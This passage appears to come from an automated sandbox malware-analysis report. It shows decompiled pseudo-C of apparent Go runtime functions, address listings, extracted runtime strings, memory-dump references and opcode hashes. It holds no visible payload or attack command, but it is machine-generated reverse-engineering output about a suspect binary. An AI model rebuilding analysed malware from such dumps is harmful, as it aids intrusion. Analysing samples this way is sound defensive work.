				E01332340(_t105, _t112, _t120);
				E01332C40(_t59, _t61, _t62, _t63, 0x1388cda, _t92, _t112, _t120);
				L01332AA0(_t60, _t61, _t63, _v40, _t97, _t112, _t120);
				E01332C40(_t59, _t61, _t62, _t63, 0x1386a9d, _t92, _t112, _t120);
				L01332AA0(_t60, _t61, _t63, _v48, _t97, _t112, _t120);
				E01332C40(_t59, _t61, _t62, _t63, 0x13873ef, _t92, _t112, _t120);
				L01332AA0(_t60, _t61, _t63, _v56, _t97, _t112, _t120);
				E01332C40(_t59, _t61, _t62, _t63,  &M0138678C, _t92, _t112, _t120);
				L01332AA0(_t60, _t61, _t63, _v64, _t97, _t112, _t120);
				E01332C40(_t59, _t61, _t62, _t63, 0x13867b1, _t92, _t112, _t120);
				L013323C0(_t105, _t112, _t120);
				asm("inc esp");
				_v16 = 0;
				_v32 = 0x1350e20;
				_v24 = _a24;
				_v16 = _a32;
				_t99 = _v40;
				_t90 =  >  ? _t99 - 0x800 : _v80 + 0xffffff00;
				_t95 =  <  ? _t99 + 0x800 : _v72 + 0x100;
				_t96 =  <  ? _v64 :  <  ? _t99 + 0x800 : _v72 + 0x100;
				_t102 = _v56;
				_t91 =  >  ? _t102 : _t90;
				_t73 =  >  ? _t102 : _t90;
				return L01332DA0(_t59, _t60, _t61, _t62, _t63,  >  ? _t102 : _t90,  <  ? _v64 :  <  ? _t99 + 0x800 : _v72 + 0x100,  &_v32, _v72, _t112, _t118, _t119, _t120);
			}
































                                                                                                                            0x01350c40
                                                                                                                            0x01350c40
                                                                                                                            0x01350c40
                                                                                                                            0x01350c40
                                                                                                                            0x01350c40
                                                                                                                            0x01350c40
                                                                                                                            0x01350c40
                                                                                                                            0x01350c40
                                                                                                                            0x01350c40
                                                                                                                            0x01350c40
                                                                                                                            0x01350c40
                                                                                                                            0x01350c40
                                                                                                                            0x01350c40
                                                                                                                            0x01350c40
                                                                                                                            0x01350c40
                                                                                                                            0x01350c44
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x01350de3
                                                                                                                            0x01350de3
                                                                                                                            0x01350de8
                                                                                                                            0x01350ded
                                                                                                                            0x01350df2
                                                                                                                            0x01350df7
                                                                                                                            0x01350e0b
                                                                                                                            0x01350c4a
                                                                                                                            0x01350c4e
                                                                                                                            0x01350c53
                                                                                                                            0x01350c58
                                                                                                                            0x01350c5c
                                                                                                                            0x01350c63
                                                                                                                            0x01350c78
                                                                                                                            0x01350c78
                                                                                                                            0x01350c65
                                                                                                                            0x01350c68
                                                                                                                            0x00000000
                                                                                                                            0x01350c6a
                                                                                                                            0x01350c6a
                                                                                                                            0x01350c6d
                                                                                                                            0x01350c70
                                                                                                                            0x01350c70
                                                                                                                            0x01350c68
                                                                                                                            0x01350c7b
                                                                                                                            0x01350c80
                                                                                                                            0x01350c85
                                                                                                                            0x01350c8a
                                                                                                                            0x01350c8f
                                                                                                                            0x01350c97
                                                                                                                            0x01350c9f
                                                                                                                            0x01350ca4
                                                                                                                            0x01350cab
                                                                                                                            0x01350cab
                                                                                                                            0x01350cae
                                                                                                                            0x01350cb3
                                                                                                                            0x01350cc4
                                                                                                                            0x01350cce
                                                                                                                            0x01350ce0
                                                                                                                            0x01350cea
                                                                                                                            0x01350d00
                                                                                                                            0x01350d0a
                                                                                                                            0x01350d20
                                                                                                                            0x01350d2a
                                                                                                                            0x01350d40
                                                                                                                            0x01350d45
                                                                                                                            0x01350d4a
                                                                                                                            0x01350d50
                                                                                                                            0x01350d60
                                                                                                                            0x01350d6d
                                                                                                                            0x01350d7a
                                                                                                                            0x01350d8a
                                                                                                                            0x01350d99
                                                                                                                            0x01350db3
                                                                                                                            0x01350dbf
                                                                                                                            0x01350dc3
                                                                                                                            0x01350dcb
                                                                                                                            0x01350dcb
                                                                                                                            0x01350de2

                                                                                                                            Strings
                                                                                                                            • } stack=[ MB goal, flushGen gfreecnt= pages at ptrSize= runqsize= runqueue= s.base()= spinning= stopwait= sweepgen sweepgen= targetpc= throwing= until pc=, bound = , limit = /dev/stdinBad varintCancelIoExChorasmianCreatePipeDeprecatedDevanagariDnsQuery_WE, xrefs: 01350CEF
                                                                                                                            • ), ->: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDTISTJ, xrefs: 01350D2F
                                                                                                                            • ,-./0:<=?CLMPSZ[\, xrefs: 01350D0F
                                                                                                                            • , fp:-0930AdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicSTermTakriTamil] = (arrayclosedeferfalsefaultgFreegcinggscanhchaninit int16int32int64mheapntohspanicscav schedsleepslicesse41sse42ssse3sudogsweeptraceuint8usage B -> Value addr= a, xrefs: 01350CD3
                                                                                                                            • stack: frame={sp:swept cached spanthread exhaustionunknown caller pcwait for GC cyclewrong medium type but memory size because dotdotdot in async preempt to non-Go memory , locked to threadArab Standard TimeCaucasian_AlbanianCommandLineToArgvWCreateFileMapp, xrefs: 01350CB8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ), ->: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDTISTJ$, fp:-0930AdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicSTermTakriTamil] = (arrayclosedeferfalsefaultgFreegcinggscanhchaninit int16int32int64mheapntohspanicscav schedsleepslicesse41sse42ssse3sudogsweeptraceuint8usage B -> Value addr= a$,-./0:<=?CLMPSZ[\$stack: frame={sp:swept cached spanthread exhaustionunknown caller pcwait for GC cyclewrong medium type but memory size because dotdotdot in async preempt to non-Go memory , locked to threadArab Standard TimeCaucasian_AlbanianCommandLineToArgvWCreateFileMapp$} stack=[ MB goal, flushGen gfreecnt= pages at ptrSize= runqsize= runqueue= s.base()= spinning= stopwait= sweepgen sweepgen= targetpc= throwing= until pc=, bound = , limit = /dev/stdinBad varintCancelIoExChorasmianCreatePipeDeprecatedDevanagariDnsQuery_WE
                                                                                                                            • API String ID: 0-41244472
                                                                                                                            • Opcode ID: 060ad3147a2240e40cde10feab9358c4bd2f525246c3ec4cb62b3b8c290eac28
                                                                                                                            • Instruction ID: fe00fb3ab38431efb07c4ec003923dc0820e7b084a70a7674adea3d637c05583
                                                                                                                            • Opcode Fuzzy Hash: 060ad3147a2240e40cde10feab9358c4bd2f525246c3ec4cb62b3b8c290eac28
                                                                                                                            • Instruction Fuzzy Hash: 5B415B72218F8482DB64DB09F88039BB764F799B88F504125EECE47B29DF38C5558B40
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8AC9BD4 Relevance: 6.3, APIs: 5, Instructions: 76COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _errnomalloc$_callnewh$AllocateHeap_invalid_parameter_noinfo_snprintf
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3487649172-0
                                                                                                                            • Opcode ID: b4f2f3c2e1c11e2decf4288cd6928d8ca2bbb472ec1e89898e9bf29564b3272e
                                                                                                                            • Instruction ID: 5efbc6e64767569d3f7e39274f314f6b0261c855ea04a014724431e45d439038
                                                                                                                            • Opcode Fuzzy Hash: b4f2f3c2e1c11e2decf4288cd6928d8ca2bbb472ec1e89898e9bf29564b3272e
                                                                                                                            • Instruction Fuzzy Hash: E4117F31A1CF044FEB99EF6CA84A3A576D1EB89321F24455EF04AC3296DB34D84147D9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 013093A0 Relevance: 6.3, Strings: 5, Instructions: 75COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 78%
                                                                                                                            			E013093A0(signed int __ecx, signed int __rbx, long long __rbp, void* __r14, long long _a8, signed long long _a16) {
				char _v8;
				long long _v16;
				signed long long _v24;
				signed long long _v32;
				signed long long _v40;
				void* _t21;
				signed int _t35;
				signed int _t42;
				void* _t43;
				void* _t44;
				void* _t45;
				void* _t46;
				long long _t49;
				signed long long _t63;
				signed long long _t67;
				signed long long _t68;
				void* _t70;
				signed long long _t71;
				long long _t72;
				void* _t75;

				L0:
				while(1) {
					L0:
					_t78 = __r14;
					_t73 = __rbp;
					_t60 = __rbx;
					if(_t75 <=  *((intOrPtr*)(__r14 + 0x10))) {
						goto L7;
					}
					L1:
					_v8 = __rbp;
					_t73 =  &_v8;
					_t67 =  *(__rbx + 8) + 1;
					 *(__rbx + 8) = _t67;
					_t69 = __rbx;
					_t71 = _t67;
					_t42 = __ecx & 0x0007ffff;
					_t63 = __rbx << 0x00000010 | _t67;
					_t68 = _t63;
					_t60 = _t63 >> 0x13 << 3;
					if(__rbx == _t60) {
						goto L4;
					} else {
						L2:
						L6:
						_v32 = _t71;
						_v16 = __rbx;
						_v40 = _t68;
						_v24 = _t60;
						E01332340(__rbx,  &_v8, __r14);
						E01332C40(_t42, _t44, _t45, _t46, 0x138df70, _t60,  &_v8, __r14);
						E01332BC0(_t42, _t44, _t45, _t46, _v16, _t70,  &_v8, __r14);
						E01332C40(_t42, _t44, _t45, _t46, 0x1386a52, _t60, _t73, _t78);
						L01332AA0(_t43, _t44, _t46, _v32, _t68, _t73, _t78);
						E01332C40(_t42, _t44, _t45, _t46, 0x1386f7d, _t60, _t73, _t78);
						L01332AA0(_t43, _t44, _t46, _v40, _t68, _t73, _t78);
						E01332C40(_t42, _t44, _t45, _t46, 0x13871a6, _t60, _t73, _t78);
						E01332BC0(_t42, _t44, _t45, _t46, _v24, _t70, _t73, _t78);
						E013325A0(_t42, _t43, _t44, _t45, _t46, _t73, _t78);
						L013323C0(_t69, _t73, _t78);
						_t49 = 0x1387cf8;
						E01330BA0(0x1387cf8, _t60, _t73);
						goto L7;
					}
					while(1) {
						L4:
						 *_t69 =  *_t49;
						_t72 = _t49;
						asm("lock dec eax");
						_t35 = _t35 & 0xffffff00 | __eflags == 0x00000000;
						__eflags = _t35;
						if(__eflags != 0) {
							break;
						}
						L3:
						_t49 = _t72;
					}
					L5:
					return _t21;
					L8:
					goto L4;
					L7:
					_a8 = _t49;
					_a16 = _t60;
					E01356200(_t69, _t73);
				}
			}























                                                                                                                            0x013093a0
                                                                                                                            0x013093a0
                                                                                                                            0x013093a0
                                                                                                                            0x013093a0
                                                                                                                            0x013093a0
                                                                                                                            0x013093a0
                                                                                                                            0x013093a4
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x013093aa
                                                                                                                            0x013093ae
                                                                                                                            0x013093b3
                                                                                                                            0x013093bc
                                                                                                                            0x013093bf
                                                                                                                            0x013093c4
                                                                                                                            0x013093cb
                                                                                                                            0x013093ce
                                                                                                                            0x013093d4
                                                                                                                            0x013093d7
                                                                                                                            0x013093de
                                                                                                                            0x013093e5
                                                                                                                            0x00000000
                                                                                                                            0x013093e7
                                                                                                                            0x013093e7
                                                                                                                            0x0130940e
                                                                                                                            0x0130940e
                                                                                                                            0x01309413
                                                                                                                            0x01309418
                                                                                                                            0x0130941d
                                                                                                                            0x01309422
                                                                                                                            0x01309433
                                                                                                                            0x01309440
                                                                                                                            0x01309451
                                                                                                                            0x01309460
                                                                                                                            0x01309471
                                                                                                                            0x01309480
                                                                                                                            0x01309491
                                                                                                                            0x013094a0
                                                                                                                            0x013094a5
                                                                                                                            0x013094aa
                                                                                                                            0x013094af
                                                                                                                            0x013094c0
                                                                                                                            0x00000000
                                                                                                                            0x013094c0
                                                                                                                            0x013093ec
                                                                                                                            0x013093ec
                                                                                                                            0x013093ef
                                                                                                                            0x013093f2
                                                                                                                            0x013093f8
                                                                                                                            0x013093fd
                                                                                                                            0x01309400
                                                                                                                            0x01309402
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x013093e9
                                                                                                                            0x013093e9
                                                                                                                            0x013093e9
                                                                                                                            0x01309404
                                                                                                                            0x0130940d
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x013094c6
                                                                                                                            0x013094c6
                                                                                                                            0x013094cb
                                                                                                                            0x013094d0
                                                                                                                            0x013094da

                                                                                                                            Strings
                                                                                                                            • -> node= B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=(unknown), newval=, oldval=, size = , tail = : status=Bassa_VahBhaiksukiCuneiformDiacriticFindClos, xrefs: 01309485
                                                                                                                            • packed= pointer stack=[ status AcceptExArmenianBalineseBopomofoBugineseCancelIoCherokeeCyrillicDuployanEthiopicExtenderGeorgianGujaratiGurmukhiHiraganaJavaneseKatakanaKayah_LiLinear_ALinear_BMahajaniOl_ChikiPhags_PaReadFileTagbanwaTai_ThamTai_VietTifinaghUgar, xrefs: 01309465
                                                                                                                            • lfstack.pushmadvdontneedmheapSpecialmspanSpecialnetapi32.dllnot pollableraceFiniLockreleasep: m=runtime: gp=runtime: sp=self-preemptshort bufferspanSetSpinesweepWaiterstraceStringswirep: p->m=worker mode != sweepgen MB globals, MB) workers= called from flu, xrefs: 013094AF
                                                                                                                            • cnt= max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930AdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicSTermTakriTamil] = (arrayclosedeferfalsefaultgFreegcinggscanhchaninit int16int32int64mheapntohspanicscav , xrefs: 01309445
                                                                                                                            • runtime: lfstack.push invalid packing: node=cannot send after transport endpoint shutdownexitsyscall: syscall frame is no longer validheapBitsSetType: called with non-pointer typereflect: internal error: invalid method indexruntime.minit: duplicatehandle faile, xrefs: 01309427
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: -> node= B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=(unknown), newval=, oldval=, size = , tail = : status=Bassa_VahBhaiksukiCuneiformDiacriticFindClos$ cnt= max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930AdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicSTermTakriTamil] = (arrayclosedeferfalsefaultgFreegcinggscanhchaninit int16int32int64mheapntohspanicscav $ packed= pointer stack=[ status AcceptExArmenianBalineseBopomofoBugineseCancelIoCherokeeCyrillicDuployanEthiopicExtenderGeorgianGujaratiGurmukhiHiraganaJavaneseKatakanaKayah_LiLinear_ALinear_BMahajaniOl_ChikiPhags_PaReadFileTagbanwaTai_ThamTai_VietTifinaghUgar$lfstack.pushmadvdontneedmheapSpecialmspanSpecialnetapi32.dllnot pollableraceFiniLockreleasep: m=runtime: gp=runtime: sp=self-preemptshort bufferspanSetSpinesweepWaiterstraceStringswirep: p->m=worker mode != sweepgen MB globals, MB) workers= called from flu$runtime: lfstack.push invalid packing: node=cannot send after transport endpoint shutdownexitsyscall: syscall frame is no longer validheapBitsSetType: called with non-pointer typereflect: internal error: invalid method indexruntime.minit: duplicatehandle faile
                                                                                                                            • API String ID: 0-3705293079
                                                                                                                            • Opcode ID: bd4b789676844565f11f49df1f25230df2f44fbc3c2e3844125b0c83801ba6c3
                                                                                                                            • Instruction ID: 2dbc0e78e183757777d59a57b90ed968e23598175c09fa6fa82146770f378082
                                                                                                                            • Opcode Fuzzy Hash: bd4b789676844565f11f49df1f25230df2f44fbc3c2e3844125b0c83801ba6c3
                                                                                                                            • Instruction Fuzzy Hash: 7E315E32214B85C6DB14EF55F89039EB768F799788F885421EE8D07B65CF38C155C714
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 01329D80 Relevance: 6.3, Strings: 5, Instructions: 71COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 77%
                                                                                                                            			E01329D80(unsigned int __ecx, intOrPtr __edx, long long __rax, void* __rsi, long long __rbp, void* __r14, long long _a8) {
				char _v8;
				unsigned long long _v16;
				signed long long _v24;
				void* _t24;
				void* _t48;
				void* _t49;
				void* _t50;
				signed int _t68;
				unsigned long long _t69;
				signed long long _t70;
				unsigned long long _t74;
				void* _t79;

				L0:
				while(1) {
					L0:
					_t82 = __r14;
					_t77 = __rbp;
					_t59 = __rax;
					_t46 = __edx;
					_t41 = __ecx;
					if(_t79 <=  *((intOrPtr*)(__r14 + 0x10))) {
						goto L11;
					}
					L1:
					_v8 = __rbp;
					_t77 =  &_v8;
					_t69 =  *((intOrPtr*)(__rax + 0x20));
					_t74 = _t69;
					_t70 = _t69 >> 0x20;
					if(__edx > __ecx) {
						L10:
						_v16 = _t74;
						_v24 = _t70;
						E01332340(_t74, _t77, _t82);
						E01332C40(_t41, _t48, _t49, _t50, 0x1386ee7, _t68, _t77, _t82);
						E01332940(_t48, _t49, _t50, _v24, _t70, _t77, _t82);
						E01332C40(_t41, _t48, _t49, _t50, 0x138726c, _t68, _t77, _t82);
						E01332940(_t48, _t49, _t50, _v16, _t70, _t77, _t82);
						E013325A0(_t41, _t46, _t48, _t49, _t50, _t77, _t82);
						L013323C0(_t74, _t77, _t82);
						_t59 = 0x138cde8;
						E01330BA0(0x138cde8, _t68, _t77);
						goto L11;
					}
					L2:
					_t41 = __ecx >> 9;
					if( *((intOrPtr*)(__rax + 0x10)) > _t70) {
						L3:
						_t70 = (_t70 << 3) +  *((intOrPtr*)(__rax + 8));
						_t68 =  *_t70;
						if(_t68 != 0) {
							L4:
							_t46 =  *((intOrPtr*)(_t68 + 0x10));
							if(_t46 == 0) {
								L9:
								E01330BA0(0x138ea71, _t68, _t77);
								goto L10;
							} else {
								L5:
								if(_t46 == 0x200) {
									L8:
									E01330BA0(0x138e652, _t68,  &_v8);
									goto L9;
								} else {
									L6:
									_a8 = __rax;
									 *_t70 = _t74;
									 *((intOrPtr*)(_t68 + 0x10)) = 0;
									_t24 = E013093A0( *((intOrPtr*)(_t68 + 0x10)), _t68,  &_v8, __r14);
									_t59 = _a8;
								}
							}
						}
					}
					L7:
					_t13 = _t59 + 0x20;
					 *_t13 = _t70;
					 *((intOrPtr*)(_t59 + 0x10)) =  *_t13;
					return _t24;
					L12:
					L11:
					_a8 = _t59;
					E01356200(_t74, _t77);
				}
			}















                                                                                                                            0x01329d80
                                                                                                                            0x01329d80
                                                                                                                            0x01329d80
                                                                                                                            0x01329d80
                                                                                                                            0x01329d80
                                                                                                                            0x01329d80
                                                                                                                            0x01329d80
                                                                                                                            0x01329d80
                                                                                                                            0x01329d84
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x01329d8a
                                                                                                                            0x01329d8e
                                                                                                                            0x01329d93
                                                                                                                            0x01329d98
                                                                                                                            0x01329d9d
                                                                                                                            0x01329da0
                                                                                                                            0x01329da6
                                                                                                                            0x01329e2e
                                                                                                                            0x01329e2e
                                                                                                                            0x01329e33
                                                                                                                            0x01329e38
                                                                                                                            0x01329e49
                                                                                                                            0x01329e53
                                                                                                                            0x01329e64
                                                                                                                            0x01329e70
                                                                                                                            0x01329e75
                                                                                                                            0x01329e7a
                                                                                                                            0x01329e7f
                                                                                                                            0x01329e8b
                                                                                                                            0x00000000
                                                                                                                            0x01329e8b
                                                                                                                            0x01329dac
                                                                                                                            0x01329dac
                                                                                                                            0x01329db3
                                                                                                                            0x01329db5
                                                                                                                            0x01329db9
                                                                                                                            0x01329dbd
                                                                                                                            0x01329dc3
                                                                                                                            0x01329dc5
                                                                                                                            0x01329dc5
                                                                                                                            0x01329dca
                                                                                                                            0x01329e1d
                                                                                                                            0x01329e29
                                                                                                                            0x00000000
                                                                                                                            0x01329dcc
                                                                                                                            0x01329dcc
                                                                                                                            0x01329dd2
                                                                                                                            0x01329e0c
                                                                                                                            0x01329e18
                                                                                                                            0x00000000
                                                                                                                            0x01329dd4
                                                                                                                            0x01329dd4
                                                                                                                            0x01329dd4
                                                                                                                            0x01329ddb
                                                                                                                            0x01329de1
                                                                                                                            0x01329deb
                                                                                                                            0x01329df0
                                                                                                                            0x01329df0
                                                                                                                            0x01329dd2
                                                                                                                            0x01329dca
                                                                                                                            0x01329dc3
                                                                                                                            0x01329df6
                                                                                                                            0x01329df8
                                                                                                                            0x01329df8
                                                                                                                            0x01329dfe
                                                                                                                            0x01329e0b
                                                                                                                            0x00000000
                                                                                                                            0x01329e91
                                                                                                                            0x01329e91
                                                                                                                            0x01329e96
                                                                                                                            0x01329e9b

                                                                                                                            Strings
                                                                                                                            • , tail = : status=Bassa_VahBhaiksukiCuneiformDiacriticFindCloseHex_DigitInheritedKhudawadiLocalFreeMalayalamMongolianMoveFileWNabataeanPGDGBKWRPPalmyreneSamaritanSundaneseWSASendToWriteFileatomicor8bad prunechan sendcomplex64copystackctxt != 0debugLockhchanLea, xrefs: 01329E58
                                                                                                                            • fully empty unfreed span set block found in resetinvalid memory address or nil pointer dereferenceinvalid or incomplete multibyte or wide characterpanicwrap: unexpected string after package name: runtime: unexpected waitm - semaphore out of syncs.allocCount !=, xrefs: 01329E0C
                                                                                                                            • head = invalidminpc= pacer: panic: runningsyscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= packed= pointer stack=[ status AcceptExArmenianBalineseBopomofoBugineseCancelIoCherokeeCyrillicDuployanEthiop, xrefs: 01329E3D
                                                                                                                            • span set block with unpopped elements found in resetcompileCallback: argument size is larger than uintptrgoroutine running on other thread; stack unavailablegcControllerState.findRunnable: blackening not enabledno goroutines (main called runtime.Goexit) - de, xrefs: 01329E1D
                                                                                                                            • attempt to clear non-empty span setfile type does not support deadlinefindrunnable: netpoll with spinninggreyobject: obj not pointer-alignedmheap.freeSpanLocked - invalid freemismatched begin/end of activeSweepnetwork dropped connection on resetpersistentalloc, xrefs: 01329E7F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
